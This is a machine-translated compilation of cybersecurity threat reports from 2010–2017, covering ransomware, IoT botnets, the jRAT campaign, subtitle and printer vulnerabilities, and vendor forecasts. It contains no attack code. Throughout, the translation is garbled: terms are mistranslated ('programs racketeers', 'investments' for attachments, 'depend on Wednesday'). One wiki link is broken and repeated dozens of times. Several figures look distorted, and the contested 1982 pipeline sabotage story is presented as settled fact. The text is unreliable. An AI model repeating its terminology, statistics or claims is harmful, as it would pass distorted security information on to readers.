  • Programs racketeers. Slightly less than 10% of the organizations revealed activity of programs racketeers. In each single day of 1.2% of the organizations detected botnets racketeers in the corporate networks. The greatest activity was observed on the weekend: malefactors tried to implement harmful traffic bypassing the security service specialists working at the weekend. In process of growth of average volume of traffic of different botnets racketeers also the average number of the organizations becoming the purposes of the attacks increased.
  • Trends of development of exploits. 80% of the organizations announced identification in the systems of the exploits constituting serious and critically serious danger. The majority of these target exploits was developed within the last five years, however malefactors used also those vulnerabilities which existed last century. Distribution of exploits by geographical areas rather evenly. Possibly, it is caused by the fact that the activity of a huge number of exploits is completely automated with assistance of the tools scanning the Internet on existence of vulnerabilities.

2) Interpenetration of infrastructures and IoT promote acceleration of distribution of the malware

In process of growth of volumes of data transmission and resources between users and networks also the number of the attacks in different geographical areas and fields of activity increases. The research of the malware allows to gain an impression about stages of preparation and implementation of the attacks. It should be noted that a problem of ensuring protection against the mobile malware such factors as vulnerability of devices within internal network complicate, frequent connections to public networks and lack of corporate control over the devices which are in ownership of users.

  • Mobile malware. Indicators of prevalence of the mobile malware from the 4th quarter 2016 the 1st quarter 2017 remained stable: about 20% of the organizations revealed the mobile malware. This quarter the majority in the list of 10 most widespread threats was made by families of the malware striking Android devices. The general ratio on all types of the malware in the 1st quarter made 8.7% — in the 4th quarter this value was equal to 1.7%.
  • Distribution on regions. The mobile malware extends in all regions, except for the Middle East more and more widely. In all cases the observed growth is statistically reliable, it cannot be written off for accidental waves. By consideration in a regional section of a trend of distribution of the malware striking Android devices show the most obvious geographical binding.

3) Decrease in efficiency of tracking of a status of flexible distributed infrastructures is observed

Trends of development of threats depend on Wednesday therefore it is very important to be aware of changes which undergo information technologies, services, controls and behavior eventually. The accessibility to up-to-date data allows to make idea of security policies and management models in general and also to successfully monitor development of exploits, the malware and botnets in process of complication of networks and increase in degree of their distribution.

In process of increase in quantity of the potential directions of the attacks within expanded network the efficiency of tracking and management of modern infrastructures decreases. Such trends as universal distribution of separate and public cloud solutions, IoT development, connection to networks of a large number of the most different intelligent devices and emergence of the out-of-band directions of threats, such as shadow IT resources, led to excessive increase in load of specialists in information security.

  • The ciphered traffic. Mean value of a ratio between traffic of HTTPS and HTTP reached record value — about 55%. This trend promotes preserving of confidentiality, however creates difficulties during tracking and identification of threats. Many security aids are insufficiently effective when tracking of the ciphered data. The organizations, especially in what the volume of traffic of HTTPS is higher can face the threats hidden in the ciphered data.
  • Applications. On average the organization uses 62 cloud applicaions that makes about a third of total number of the detected applications. At the same time the number of applications of IaaS reached a new maximum. The problem of many organizations is that at data movement in a cloud the efficiency of tracking of their status can decrease considerably. Besides, the disputable tendency to increase in amount of data for which storage similar applications and services are used is observed.
  • Fields of activity. As showed the group analysis on the industries, for the majority of spheres the danger is constituted by the same directions of threats. Among the few exceptions appeared education and telecommunications. It means that malefactors can use with ease the similar directions of the attacks in different spheres, especially in the presence of the automated tools.

Check Point: hackers can use subtitlings for cracking of millions of devices

Check Point announced in May, 2017 detection of the new vector of the attacks menacing to millions of users of popular mediaplayers, including VLC, the Kodi (XBMC), Popcorn Time and Stremio. Creating harmful subtitlings, hackers can receive management of any devices on which these mediaplayers are installed. Mobile devices, the PC and Smart TV concern them.

"The production process of subtitlings is difficult, in it more than 25 different formats are used, each of which has unique features and potential. The fragmented ecosystem along with limited security means existence of a set of vulnerabilities that does it by extremely attractive purpose for malefactors — Omri Herscovici, the head of a team of researchers of vulnerabilities, Check Point Software Technologies says. — We found out that harmful subtitlings can be created and be delivered to millions of devices automatically, passing security systems. As a result hackers receive full control over the infected devices and data which on them contain".

The team of researchers of Check Point detected vulnerabilities in four most popular mediaplayers: VLC, the Kodi, Popcorn Time and Stremio — also announces them according to the instruction for disclosure of information. Using vulnerabilities of these platforms, hackers have an opportunity to take control over devices on which they are set.

File:Subtitle vulnerability infographic.jpg

Subtitlings to movies and a TV show are created by many authors and loaded into the general online storages, such as where they are indexed and classified. Researchers of Check Point found out that, thanks to manipulation with a ranking algorithm, harmful subtitlings are automatically downloaded by the mediaplayer, allowing the hacker to receive full control over all chain of providing subtitlings without involvement of users.

All four companies corrected vulnerabilities on the platforms. Stremio and VLC also released the new versions of software including these changes. "To protect themselves and to minimize risk of the possible attacks, users should be convinced that they update the mediaplayers to the latests version" — concluded Hershovichi.

Hunting for the state databases

The report of NTT Security 2017 Global Threat Intelligence Report including data of poll more than 10 thousand clients on five continents shows that public institutions even more often become the purpose of cybercriminals. Quite often the attacks become frequent on the eve of the important geopolitical events, such as presidential or parliamentary elections, meetings of politicians, vote on important issues in parliament etc.[11].

The danger consists that public institutions can be exposed both to attack because of borders of the country, and the attack of local hackers. Public institutions are keepers of a large number of any information: from personal data of citizens to intelligence information. Thus, data from public institution can be interesting to both ordinary racketeers, and well organized criminal and terrorist organizations. Besides, today criminals hunt including on data which can affect public opinion contain the compromising information on politicians, their expenses, etc. As a result of an attack to state agencies become more difficult and more large-scale, and unfortunately, not always the systems of protection can resist to threat.

The analysis showed that about 63% of all cyber attacks are organized from the IP addresses in the USA, another 4% are performed from Great Britain and 3% from China. The main threats for cyber security are the phishing, a compromise of e-mail, DDoS attack, etc. A potential source and the purpose of the attack are structures of the Internet of Things (IT) and cloud servers. From detected in 2016. The IV-attacks of 66% tried to detect certain devices, such as video camera.

Campaigns for distribution of malwares on Java

In April, 2017 experts of Zscaler company noted the sharp growth of number of harmful instruments of remote administration based on Java (jRAT).[12]

The scheme looks rather simply: using various tricks (first of all, social engineering) malefactors try to obtain that users opened investments to their letters; these investments contain harmful JAR files. Usually letters look as messages from tax authorities or as orders of any goods or services. Having got on the machine, the harmful JAR file downloads a script on VBS which scans a system regarding existence of firewalls and antiviruses. Upon termination of scanning the JAR file registers in the Temp folder and is started.

In April, 2017 experts of Zscaler company noted the sharp growth of number of harmful instruments of remote administration based on Java
In April, 2017 experts of Zscaler company noted the sharp growth of number of harmful instruments of remote administration based on Java

The code of the main malware has complex structure in which for separate tasks — for example, separate modules are responsible for connections with the control server —. In the code of a malware it is entered the URL server from which it could dokachivat add-on harmful modules. It is interesting that the same server which is located in the domain in the past was noticed in distribution of the Loki malware. By April 21 it is inactive. Harmful components mostly are downloaded from file exchange resources, such as Dropbox.

Experts of ZScaler noted that at jRAT-malwares with which a number of atypical features was succeeded to eat with it. The file of a malware is three times ciphered, the program code is supplied with powerful obfuscation. All this is made to prevent automatic detection by antiviruses and to complicate the manual or automated analysis. Besides, the author of a malware even considered digit capacity of the operating system: for JAR files DLL are provided 32-bit and 64-bit.

Malefactors continue to improve the tools. The more money can bring a malware at least theoretically, the his authors will make more efforts to provide his reserve and to prevent the analysis — Ksenia Shilak, the sales director of SEC-Consult company says the Russian — Most certain way for users to secure herself — not to open any investments if they cause the minimum suspicions, and not to start Java in the computer without special need.

Dangerous network printers

On February 1, 2017 researchers of the university of the city of Ruhr in Germany detected a number of critical vulnerabilities in firmwares of some models of network printers. According to their research (official representation in May, 2017), by means of the detected vulnerabilities malefactors can receive copies sent for printing of documents and even to take control over corporate network.

For February 7, 2017 all printers during printing are controlled the computer using several special protocols and languages. In a case with network printers during printing the computer at first initializes the printer through the protocol of control of the device, then sets with it exchange to data through the network protocol then it sends it a task for printing at first on a job control language, and then on a page description language[13].

In other words, at start of printing the computer finds the printer in network, awakens it and reports that it is necessary to print, for example, two documents — at first the document with one identifier, and then — with another. At the same time for each document the additional description goes, how exactly it should be printed — to scroll one line, on such coordinates to apply paint, etc. The main job control languages and descriptions of pages are written in the 1970-80th years and today are used on all printers.

The detected vulnerabilities potentially are present at all printers (because of community of languages of management of them), but pose the greatest threat on network devices as it is possible to be connected to them far off, but not on USB, as in a case with home devices. The simplest that the malefactor with the network printer can make — to send it to a closed loop, having forced to perform the same operation. At the same time the device will cease to answer all external commands.

The tested printers: a red mark — vulnerabilities are detected, pink vulnerabilities are detected partially, white — vulnerabilities are not found, (2017)
The tested printers: a red mark — vulnerabilities are detected, pink vulnerabilities are detected partially, white — vulnerabilities are not found, (2017)

According to researchers, vulnerabilities are detected on 20 printers of Dell companies, HP, Lexmark, Brother (Brazer), Samsung, Kyocera, Konica and OKI. Scientists believe that the problem is widespread more widely, but cannot check this assumption as the project of studying of vulnerabilities is not financed. Researchers sent reports on the found gaps to producers from which only the Dell company responded - for January, 2017 did not eliminate the found vulnerabilities.

Researchers created own tool — the PRET program, it allows to test any printer connected on USB, Wi-Fi or LAN on existence of vulnerabilities.

The young hacker cracked 160 thousand printers worldwide

The hacker calling himself Stackoverflowin which is also represented "god of hacking" claims that he wrote a script which automatically looks for the public printers and terminals of sales supporting protocols of network printing of RAW, Internet Printing Protocol I Line Printer Remote functioning based on ports 9100, 631 and 515 respectively[14] in Network[15].

The detected devices with open ports the script forced to print the boastful "letter of happiness" from the hacker containing the recommendation urgently to close ports of printers.

Already even after mailing of these messages the The Register edition using search engine revealed more than 143 thousand printers with open port 9100.

Stackoverflowin claiming that it is not 18 years old stated also that it used three vulnerabilities in the web interface of the equipment of Xerox company; these vulnerabilities allow to start far off any code on this equipment. According to the hacker, data on these gaps did not reveal yet.

The message from Stackoverflowin printed by thousands of cracked printers
The message from Stackoverflowin printed by thousands of cracked printers

In general, the hacker noticed that he is even a little upset with how it was simple to turn all invention.

On social networks (first of all, on twitter) publications with photos of printouts of hacker messages so it is obvious that Stackoverflow brags not from scratch are multiplied worldwide.


Research Fortinet

Cybercriminals set control over devices
  • IoT devices are extremely attractive to cybercriminals worldwide. Malefactors create own "armies" of devices. The low cost of the organization of the attacks, the highest speed and huge scales — here bases of an ecosystem modern [16]
  • In the 4th quarter 2016 the industry was destabilized by Altaba date leak (before Yahoo) and DDoS attack on Dyn company. In the middle of the quarter the record levels recorded based on both attacks were not only are exceeded, but also increased twice.
  • Connected to [[Internet of Things of Internet of Things (IoT)|[[Internet of Things of Internet of Things (IoT)|[[Internet of Things of Internet of Things (IoT)|[[Internet of Things of Internet of Things (IoT)|[[Internet of Things of Internet of Things (IoT)|[[Internet of Things of Internet of Things (IoT)|[[Internet of Things of Internet of Things (IoT)|[[Internet of Things of Internet of Things (IoT)|[[Internet of Things of Internet of Things (IoT)|[[Internet of Things of Internet of Things (IoT)|[[Internet of Things of Internet of Things (IoT)|[[Internet of Things of Internet of Things (IoT)|[[Internet of Things of Internet of Things (IoT)|[[Internet of Things of Internet of Things (IoT)|[[Internet of Things of Internet of Things (IoT)|[[Internet of Things of Internet of Things (IoT)|[[Internet of Things of Internet of Things (IoT)|[[Internet of Things of Internet of Things (IoT)|[[Internet of Things of Internet of Things (IoT)|[[Internet of Things of Internet of Things (IoT)|[[Internet of Things of Internet of Things (IoT)|[[Internet of Things of Internet of Things (IoT)|[[Internet of Things of Internet of Things (IoT)|[[Internet of Things of Internet of Things (IoT)|[[Internet of Things of Internet of Things (IoT)|[[Internet of Things of Internet of Things (IoT)|[[Internet of Things of Internet of Things (IoT)|[[Internet of Things of Internet of Things (IoT)|[[Internet of Things of Internet of Things (IoT)|[[Internet of Things of Internet of Things (IoT)|[[Internet of Things of Internet of Things (IoT)|[[Internet of Things of Internet of Things (IoT)|[[Internet of Things of Internet of Things (IoT)|[[Internet of Things of Internet of Things (IoT)|[[Internet of Things of Internet of Things (IoT)|[[Internet of Things of Internet of Things (IoT)|[[Internet of Things of Internet of Things (IoT)|Internet of Things (IoT)]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]] the devices struck with the botnet Mirai initiated the record number of DDoS attacks. After start of the source code Mirai the activity of a botnet within a week increased by 25 times. By the end of the year the activity increased by 125 times.
  • The research of the activity of exploits connected with IoT concerning several categories of devices showed that home routers and printers are the most vulnerable, however DVR/NVR devices quickly outstripped routers. The number of the struck devices of this category increased more than by 6 orders.
  • The great value was also purchased by a problem of the malware striking mobile devices. In spite of the fact that this type of the malware occupies only 1.7 percent in a total amount, one of each five organizations which announced the attacks using the malware faced its mobile option. Practically all exploits were developed based on Android. In structure of the attacks using the mobile malware considerable differences depending on the region were revealed: 36 percent of the attacks fall on the organizations of Africa, 23 percent — Asia, 16 percent — North America and only 8 percent — Europe. These indicators should be considered during the work with the entrusted devices in modern corporate networks.

Dominance of the large-scale automated attacks
  • The interrelation between quantity and prevalence of exploits demonstrates increase in extent of automation of the attacks and reduction in cost of the malware and instruments of distribution available on the deep Internet. The organization of the attacks became simpler and cheaper, than ever.
  • The first place in the list of the revealed exploits constituting considerable danger was occupied by SQL Slammer mainly striking educational institutions.
  • The second in prevalence is the exploit testimonial of attempts of carrying out the attacks on the remote desktop protocol (RDP) of Microsoft a trial and error method. The exploit starts 200 requests of RDP each 10 seconds, than its considerable activity in networks of the global organizations speaks.
  • The third place in the list of the most widespread exploits was taken by the signature tied to vulnerability "Memory damage" of the manager of files Windows. Using this signature the malefactor can start far off accomplishment of any code in vulnerable applications using the JPG file.
  • The greatest indicators of number and prevalence showed families of the botnets H-Worm and ZeroAccess. Using both botnets cybercriminals take the infected systems under control and abduct data or are engaged in fraud with advertisements and mining of bitcoins. The greatest number of attempts of carrying out the attacks using these two families of botnets was recorded in technology and state sectors.

Programs racketeers continue to extend
  • Irrespective of in what industry they are applied, programs racketeers deserve attention. Most likely, this effective technology of the attacks will continue development within the concept of "the program racketeers as service" (RaaS). At the expense of it the potential criminals who do not have the corresponding skills can load tools and without delay put them into practice.
  • 36% of the organizations recorded the activity of botnets connected using programs racketeers. The greatest activity was shown by TorrentLocker trojan, on the third place there was Locky.
  • The malware belonging to two families — Nemucod and Agent was widely adopted. 81.4 percent of collected samples of the malware belong to these two families. As you know, the Nemucod family is connected with programs racketeers.
  • Programs racketeers were revealed in all regions and the industries, however most they were widely adopted in health facilities. It is very disturbing trend: under the threat there are data of patients which in comparison with other data types differ in bigger storage period and the importance that is fraught with serious effects.

Research Trend Micro

Growth of fraud using corporate mail

On March 1, 2017 the Trend Micro Incorporated company published the annual report on cyber security in the world for 2016 - "Record year for cyberthreats in the corporate sector" (2016 Security Roundup: A Record Year for Enterprise Threats).

Main outputs of a research:

  • Growth of number of cases of fraud using corporate mail: on an equal basis with programs racketeers, fraud using corporate mail also was profitable to cybercriminals – financial losses of the companies from such attacks worldwide in 2016 reached $140 thousand. This type of fraud shows efficiency of use of methods of social engineering during attacks to the enterprises.
  • Variety of vulnerabilities: in 2016 Trend Micro and Zero Day Initiative (ZDI) detected record amount of vulnerabilities, the majority of which is revealed in Adobe Acrobat Reader DC and the solution WebAccess of Advantech. Both applications are widely used in the organizations, in SCADA systems.
  • A set of the Angler exploits gave in: after arrest of 50 cybercriminals, a set of the Angler exploits began to fade into the background until it finally stopped the existence. In spite of the fact that fresh sets of exploits did not need a lot of time to take its place, by the end of 2016 the amount of the vulnerabilities included in sets of exploits was reduced by 71%.
  • Bank trojans and the malicious software for ATMs: cybercriminals continue to use malware for ATMs, a skimming and bank trojans. However in recent years the attacks of malefactors become more and more various and allow them to get access to personal information and credentials of users who can be used for penetration into corporate network.
  • The attack using the botnet Mirai: in October, 2016 hackers used badly protected devices of Internet of Things for DDoS attack during which 100 thousand devices are used ~. As a result, the websites like Twitter, Reddit and Spotify became unavailable at several o'clock.
  • Date leak of users of Yahoo: the company suffered from large information leak in August, 2013 – is compromised ~ 1 billion accounts of users. An incident became known three months later after other leak, in September, 2016 as a result of which 500 million more accounts suffered.
  • Growth of number of programs racketeers. For more details see the Virus racketeer (encoder) of Ramsomware

The forecast of Trend Micro for 2017

On December 8, 2016 it became known according to forecasts of Trend Micro Incorporated - in 2017 the scope and depth of the attacks will increase, as well as a variety of policy strokes of malefactors.

Trend Micro Incorporated published the annual report with forecasts for information security for 2017 "New level – 8 forecasts for cyber security for 2017" (The Next Tier – 8 Security Predictions for 2017)[17].

Raimund Genes, CTO Trend Micro
will bring the Next year the cyber security industry to new boundaries. In 2016 the landscape of threats allowed cybercriminals to increase considerably a variety of methods of the attacks and types of the attacked purposes. In our opinion, big changes in the companies will cause the necessity of observance of requirements of "The act of personal data protection" worldwide (General Data Protection Regulation, GDPR). Besides, we predict emergence of new methods of the attacks to large corporations, expansion of tactics of online racketing which will affect the increasing variety of devices and also application of methods of cyberpromotion for manipulation with public opinion.

In 2016 the amount of vulnerabilities in devices of Apple considerably grew, in a year it was announced fifty of them. At the same time in products of Adobe this digit made 135, in products of Microsoft – 76. This noticeable shift towards Apple will amplify further.

Internet of Things (Internet of Things, IoT) and Industrial Internet of Things (Industrial Internet of Things, IIoT) will play more and more significant role in implementation of the purposeful attacks in 2017.

Such attacks will be very profitable because of universal distribution of attached devices and also thanks to an opportunity to operate the vulnerabilities which are contained in them and to use the unprotected corporate systems to break business processes in the companies – as in a case with the malicious software of Mirai. Growth of use of mobile devices for monitoring of management systems on production and infrastructure facilities in combination with a large number of the vulnerabilities found in these systems will pose a real threat for the organizations.

Fraud using corporate mail (Business Email Compromise, BEC) and cracking of business processes (Business Process Compromise, BPC) will continue to extend, representing a simple and effective method of corporate online racketing. Fraud using corporate mail, for example, can bring to malefactors $140 thousand, for this purpose it is only required to convince the victim to transfer corporate assets to the account of swindlers. At the same time, for comparison, cracking of a system of financial transactions, though requires great efforts, as a result can bring to malefactors much more − the amount can reach $81 million.

We see how cybercriminals continue to adapt to constantly changing technology landscape. If in 2016 significant growth in number of new programs racketeers was observed, then now it considerably decreased therefore hackers will look for new ways of use of already existing types of such programs. Similarly, innovations in the field of Internet of Things allow hackers to find to themselves other purposes for the attacks, and changes in the software push them to look for new vulnerabilities.

Ed Cabrera, Chief Cybersecurity Officer, Trend Micro

Forecasts for 2017:

  • Growth of number of new families of programs racketeers will slow down and will reach about 25%, however their influence will extend to devices of Internet of Things, PoS-terminals and ATMs.
  • Developers will not be able timely to provide protection of devices of Internet of Things and Industrial Internet of Things against DoS- and other types of the attacks.
  • In products of Apple and Adobe all new vulnerabilities which will be added to sets of exploits will be detected.
  • As an Internet access has 46% of the world population, the cyberpromotion role for the purpose of rendering influence on public opinion will amplify.
  • The example of the attack to the central bank of Bangladesh at the beginning of 2016 proves that the attacks with cracking of business processes allow malefactors to get considerable profit. At the same time fraud methods using corporate mail will still remain an effective method of illegal enrichment using nothing the suspecting employees.
  • Entry into force of "The act on personal data protection" (General Data Protection Regulation, GDPR) will cause changes in regulations and administrative procedures that, in turn will have a serious impact on costs of the organizations and will demand from them complete review of processing of data for compliance to new requirements.
  • New methods of carrying out the purposeful attacks will be directed to evading from modern technologies of detection and to make attacks to the companies in the most different areas.

The white book Panda Security about attacks on engineering objects

On November 30, 2016 announced division of PandaLabs of Panda Security company issue of the white book with information on the loudest cyber attacks to objects of the vital engineering infrastructure (critical) in the world and recommendations of methods of protection against the attacks on the main support of economy of the present. Lower an edition fragment.

White book Panda Security, (2016)
White book Panda Security, (2016)

Gain of a trend of interaction of all types of infrastructure reflects growth of potential number of points of penetration of the attacks into the objects which became vital for modern society. It is relevant also concerning cyber attacks which were carried out against similar networks in the past: one of the first similar attacks is executed in 1982, before emergence of the Internet. Then hackers by means of a trojan infected the systems of the Siberian oil pipeline that led to one of the most powerful non-nuclear explosions in the world.

In addition to a partial or complete stop of work of objects of critical infrastructure that happened to the Venezuelan oil company PDVSA when as a result of the attack oil production was reduced from 3 million to 370 thousand barrels a day, the similar attacks also cause significant financial damage. One of the largest producers of cars in the USA sustained losses in the amount of $150 million, "thanks to" the attack using SQLSlammer which quickly extended on 17 plants of the company.

One of the most notorious cases of cyber attack to critical infrastructure for all history is Stuxnet. It is already known that it was the approved attack of the American and Israeli intelligence agencies directed to failure of the nuclear program of Iran. This case became the catalyst which forced world community to learn about types of threats.

Some events of a row of years became milestones in development of world security, in particular, the attack on September 11. In Europe there is a similar date – on March 11, 2004, then there were explosions of trains in Madrid. As a result, the European Commission developed global strategy of protection of objects of critical infrastructure of "European Programme for Critical Infrastructure Protection" as a part of which suggestions for improvement of a package of measures are given in Europe, the terrorist attacks intended for prevention and to effective response to them.

As a result of the similar attacks, in addition, technical characteristics of objects of critical infrastructure and huge volume of other crucial data can be stolen. It means need of acceptance of special measures of protection of such infrastructure, including approved practice:

  • Check of systems on vulnerability.
  • Adequate monitoring of the networks used for control of such infrastructure facilities and, if necessary, their complete isolation from external connections.
  • Control over removable devices that is extremely important in any infrastructure not only because they are the direction of the similar attacks as was in a case with Stuxnet. At protection of such objects of critical infrastructure it is extremely important to make so that malware did not get into internal networks via removable devices which can be used also for theft of confidential information.
  • Monitoring of computers to which programmable logic controllers (PLC) are connected. These devices connected to the Internet are most sensitive as they can provide to hackers access to crucial control systems. But, even if hackers will not be able to receive control over a system, they can obtain valuable information for other directions of the attacks[18].

2015: 10 most dangerous cyber attacks of year

Neither personal information, nor fingerprints were in perfect security from cyber-criminals in 2015[19]. We give the brief summary of the most dangerous and disturbing attacks of 2015 below.

Theft of fingerprints

If fingerprints are considered as one of the safest methods of biometric security (this method is used for iPhone unblocking), then theft of information belonging to the staff of the U.S. Government showed that this system has different problems to which it is worth paying attention.

In June, 2015 the group of cyber-criminals could catch fingerprints about six million staff of federal agencies and organizations of the USA that could endanger not only their mobile phones, but also security of the country[20].

Remote control over smart cars

One more big problem which faces cyber security specialists is incident with smart cars[21]. While there is no relevant decision, these cars will be still vulnerable for manipulations over them. Last summer two hackers showed that it is possible to use errors in a computer system of Jeep Cherokee and to intercept control over the car, even having managed to apply brakes by this machine, and all transactions were performed far off.

Thousands of infected devices with Android

Not all vulnerabilities in the world of IT security are focused on modern solutions and devices. Actually, smartphones appeared in the center of mass scandal in 2015 when thousands of devices with Android were infected with Stagefright – as a result of this incident of security cyber-criminals could get access to any phone with Android and control it without the knowledge of its owner.

Furor with online acquaintances

Undoubtedly, the largest scandal of year was connected with information leak about more than 32 million users of the website of online acquaintances of Ashley Madison[22]. This incident sent a powerful blast wave to cyber security worldwide, once again having reminded each of us (both to users, and owners of online platforms) of dangers before which IT security faces.

Vulnerable infusional pump

Health and safety of people are also subject to risk as a result of presence of vulnerabilities at different devices. And it is not only about smart cars which it is possible to manage and provoke road accident remotely: in 2015 there was an incident with an infusional pump which is used in hospitals. It turned out that if the cyber-criminal managed to be connected to a local network of hospital, then he could get access to this device, manipulating it and changing parameters of its work.

Risks for gas station

It is in danger there can be not only devices in hospitals, but also gas station what researchers on both sides of Atlantic could be convinced of. Having connected to network, cyber-criminals can attack fuel pumps that can lead even to explosion.

Year about which in Apple would like to forget

2015 became the worst year for Apple in terms of security since the number of the attacks, directed to these devices, grew five times in comparison with 2014, at the same time the amount of new vulnerabilities continued to grow. One such example is the error Dyld which was detected last summer, influenced[23].

Theft of data through the third parties

In 2015 these 15 million users of T-Mobile were stolen by cyber-criminals. According to the company, information was taken not from their corporate servers, and it was stolen from the company which managed payments of clients of T-Mobile.

Theft of data via web browsers

In the summer of 2015 of Firefox it was necessary to tell the users that failure in operation of the browser was caused by that incident[24]within which cyber-criminals could find and perform theft of files of users without their permission.

The bad end of the year for Dell

Latest scandal of 2015 happened in December when it was revealed that hard errors of security fled by latest models of computers of Dell. Thanks to these vulnerabilities cyber-criminals were capable to change communications between the different systems and to perform theft of information from damaged computers.


The number of the attacks grew by 81%

In 2011 Symantec reflected more than 5.5 billion attacks that is 81% more, than in previous. Besides, the number of unique samples of a malicious code in the world increased to 403 million, the share of the daily Web attacks grew by 36%.

At the same time spam level considerably decreased, and the amount of new vulnerabilities decreased by 20%. This global statistics against the background of the continuing growth of the market of the malware reveals an interesting trend. Malefactors began to use simple tools for the existing vulnerabilities. Even more often cybercriminals aim at social networks, preferring them to spam. The nature of such networks creates wrong opinion on safety of users, and malefactors see in them the new victims. Technologies of social engineering and the virus nature of social networks allow threats to extend with a huge speed.

Intel Security: The new round of the attacks will be directed to the industrial and energy companies

For July, 2011, according to McAfee, cybercriminals spent at least 5 years, purposefully conducting attacks to 70 government institutions, non-profit organizations and corporations for data theft. The UN, the International Olympic Committee (IOC) and business companies located in the territory of the USA are among them, for example.

McAfee does not specify who stands behind these attacks. Most of the victims are not called in the report In McAfee, also as well as what data at them were stolen. It is reported only that it is the companies and the organizations from such countries in addition to the USA as Canada, South Korea, Taiwan, Japan and many others.

The report is issued after the whole series of the highly skilled hacker attacks which happened in recent months therefore companies Citigroup, Sony Corp., Lockheed Martin, PBS and others suffered. According to experts of McAfee, so-called groups of hackers activists like Anonymous and Lulzsec were involved in all of them.

According to Dmitry Alperovich, the vice president for a research of threats McAfee and the author of the report, the threat is much bigger, and many cases were simply not made public. A key to these invasions, according to him, "is mass hunger to someone else's secretion and intellectual property".

However not all organizations perceive the words of researchers watchfully. In particular, the representative of the IOC Mark Adams said that so far researchers from McAfee did not provide them proofs of attempts to compromise information security of committee.

"If it is the truth, then, of course, it cannot but disturb us. However the IOC the transparent organization has also no such secrets which would threaten our activity or reputation", - he added.

Meanwhile, researchers warn that, in particular, the energy companies can become the new purpose of cyber attacks industrial and.

"It is not threat only for the USA, it is global threat", - Tim Roxey, the director of risk management of North American Electric Reliability Corporation (NERC) said.

By estimates of this company, hackers are able to get access to any equipment of power plants, including turbine valves.

He also reminded how the group of scientists was forced to leave the nuclear reactor as a result of the attack of the notorious Stuxnet virus. According to experts of Siemens AG, for such attacks even actions of harmonious hacker group are not obligatory, the attack can be organized solely, having sufficient experience and an amount of time.

2010: Expansion of the attacks on other OS except Windows

The significant turn was outlined in 2010 in the field of cyber crime: for the first time in the history hackers began to switch the attention with the PC and Windows OS to other operating systems and platforms, including smartphones, tablet computers and mobile devices in general. It was stated in the Annual report of Cisco on information security published on January 20, 2011 for 2010.

In the last ten years hackers aimed, first of all, at operating systems for the PC. In response to it suppliers of PCs platforms and applications strengthened protection of the products and began to look for and close much more actively vulnerabilities using correctional modules (patches). As a result it became more difficult for hackers to crack platforms (in particular, the Windows platform) which allowed them to earn easily on bread and on oil earlier. Therefore malefactors look for new areas for use of harmful "talents". Here very opportunely mobile devices and applications which began to extend actively in the market appeared in time. As a result in 2011 the greatest threat for users is concealed by the mobile applications created by third-party developers.

1982: CIA blows up the Soviet gas pipeline

Staff of the American CIA implemented a bug in the Canadian software managing gas pipelines. The Soviet investigation received it software as object of industrial espionage and implemented on the Trans-Siberian pipeline. The most Big non-nuclear Bang in the history of mankind which happened in 1982 became result.

See Also


  1. IoT conceals the hidden threats
  2. Experts assessed damages from global cyber attack at $85 billion - $193 billion
  3. Four US gas pipeline data systems shut down as cyberattack hits
  4. Results of year: cyber attacks are all more expensive
  5. the computer which "cannot be cracked" Is invented
  6. Most the Russian companies are not steady against cyber attacks, stated in PwC
  7. AppsFlyer provided Protect360 for protection of business against a mobile fraud
  8. Insurers counted damage to world economy from global cyber attack
  9. otchetev the report on the world research of threats Fortinet
  10. the data collected by department of FortiGuard Labs using extensive network of devices and sensors of working environments in the 1st quarter 2017 are provided. Data collection was performed in global, regional, sectoral and organizational scales. In the center of attention there were three interconnected types of threats: exploits-application, malicious software and botnets. Besides, the Fortinet company publishes the report of data on threats (in the presence of a subscription access is free), in which the weekly overview of the most dangerous viruses, the malware and network threats and also links to data of the most relevant researches Fortinet is provided.
  11. Hackers opened hunting for the state databases
  12. Increase in jRAT Campaigns
  13. Printers were dangerous to corporate networks
  14. [ the Young hacker
  15. cracked 160 thousand printers worldwide]
  16. kiberprestupnostiv the report on the world research of threats Fortinet are provided the data collected by department of FortiGuard Labs in the 4th quarter 2016. Data collection was performed in global, regional, sectoral and organizational scales. In the center of attention there were three interconnected types of threats: exploits-application, malicious software and botnets.
  17. The Next Tier – 8 Security Predictions for 2017
  18. Panda Security: Critical infrastructure
  19. The 10 most alarming cyberattacks of 2015
  20. of US government hack stole fingerprints of 5.6 million federal employees
  21. security Shortcomings influencing the "connected" cars
  22. Lessons which we should take from date leak with Ashley Madison
  23. the Apple Company MAC OS X operating system applied security measures after losing year
  24. of You need to update Firefox right now to protect yourself from a big security flaw